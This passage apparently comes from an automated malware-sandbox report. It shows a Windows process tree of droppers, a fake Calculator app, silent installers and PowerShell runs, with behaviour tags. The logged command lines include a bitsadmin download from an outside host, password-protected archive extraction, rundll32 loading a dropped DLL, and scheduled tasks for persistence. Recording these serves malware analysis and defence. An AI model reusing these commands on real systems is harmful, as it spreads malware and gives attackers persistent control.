                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee0
                                                                                                  12⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:5752
                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1984 /prefetch:8
                                                                                                  12⤵
                                                                                                    PID:1964
                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1668 /prefetch:8
                                                                                                    12⤵
                                                                                                      PID:5496
                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:2
                                                                                                      12⤵
                                                                                                        PID:7460
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                        12⤵
                                                                                                        • Checks computer location settings
                                                                                                        PID:7396
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2536 /prefetch:1
                                                                                                        12⤵
                                                                                                        • Checks computer location settings
                                                                                                        PID:208
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:2
                                                                                                        12⤵
                                                                                                          PID:8772
                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1576 /prefetch:8
                                                                                                          12⤵
                                                                                                            PID:9012
                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=3616 /prefetch:8
                                                                                                            12⤵
                                                                                                              PID:2956
                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2168 /prefetch:8
                                                                                                              12⤵
                                                                                                                PID:5528
                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2396 /prefetch:8
                                                                                                                12⤵
                                                                                                                  PID:9064
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1012 /prefetch:8
                                                                                                                  12⤵
                                                                                                                    PID:6648
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2096 /prefetch:8
                                                                                                                    12⤵
                                                                                                                      PID:8876
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"
                                                                                                                9⤵
                                                                                                                  PID:3220
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$603CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"
                                                                                                                    10⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4524
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                      11⤵
                                                                                                                      • Drops file in Drivers directory
                                                                                                                      • Adds Run key to start application
                                                                                                                      PID:1256
                                                                                                                      • C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe
                                                                                                                        "C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe" /VERYSILENT
                                                                                                                        12⤵
                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                        PID:4944
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe"
                                                                                                                        12⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks computer location settings
                                                                                                                        PID:4604
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe"
                                                                                                                        12⤵
                                                                                                                          PID:7736
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive & exit
                                                                                                                            13⤵
                                                                                                                              PID:692
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                14⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:4844
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive
                                                                                                                                14⤵
                                                                                                                                  PID:3060
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                13⤵
                                                                                                                                  PID:6944
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654"
                                                                                                                                    14⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:7880
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634167691 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                      15⤵
                                                                                                                                        PID:8680
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe & exit
                                                                                                                                    13⤵
                                                                                                                                      PID:6236
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe
                                                                                                                                        14⤵
                                                                                                                                          PID:8172
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe" -u
                                                                                                                                            15⤵
                                                                                                                                              PID:6728
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive & exit
                                                                                                                                          13⤵
                                                                                                                                            PID:6084
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive
                                                                                                                                              14⤵
                                                                                                                                                PID:2056
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S & exit
                                                                                                                                              13⤵
                                                                                                                                                PID:1300
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S
                                                                                                                                                  14⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  PID:1052
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                    15⤵
                                                                                                                                                      PID:6692
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                      15⤵
                                                                                                                                                        PID:7948
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                        15⤵
                                                                                                                                                          PID:3220
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                          15⤵
                                                                                                                                                            PID:2576
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                            15⤵
                                                                                                                                                              PID:8640
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                16⤵
                                                                                                                                                                  PID:2956
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:8940
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                  15⤵
                                                                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                                                                  PID:7516
                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                  15⤵
                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                  PID:5528
                                                                                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:3964
                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:8928
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                      15⤵
                                                                                                                                                                        PID:8948
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:6572
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                          15⤵
                                                                                                                                                                            PID:6132
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                            15⤵
                                                                                                                                                                              PID:4444
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:4264
                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
                                                                                                                                                                                15⤵
                                                                                                                                                                                  PID:9044
                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd
                                                                                                                                                                                    16⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    PID:2724
                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                                  15⤵
                                                                                                                                                                                    PID:5704
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                                    15⤵
                                                                                                                                                                                      PID:3924
                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                                      15⤵
                                                                                                                                                                                        PID:3804
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                                        15⤵
                                                                                                                                                                                          PID:6964
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"
                                                                                                                                                                                          15⤵
                                                                                                                                                                                            PID:1272
                                                                                                                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                            15⤵
                                                                                                                                                                                              PID:3152
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:6740
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:6836
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:3836
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                  PID:5480
                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\ EXE_CMD_LINE="/forcecleanup /wintime 1635547516 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                      PID:4084
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe & exit
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:7900
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe" -u
                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                            PID:6536
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:6576
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:6788
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcteryst.jxt\autosubplayer.exe /S & exit
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:5960
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:7364
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:7356
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:5368
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\demimondaines.vbs"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:6328
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                          PID:7012
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                            PID:7040
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:5912
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe"
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5420
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\8F2E.bat "C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe""
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:6036
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe
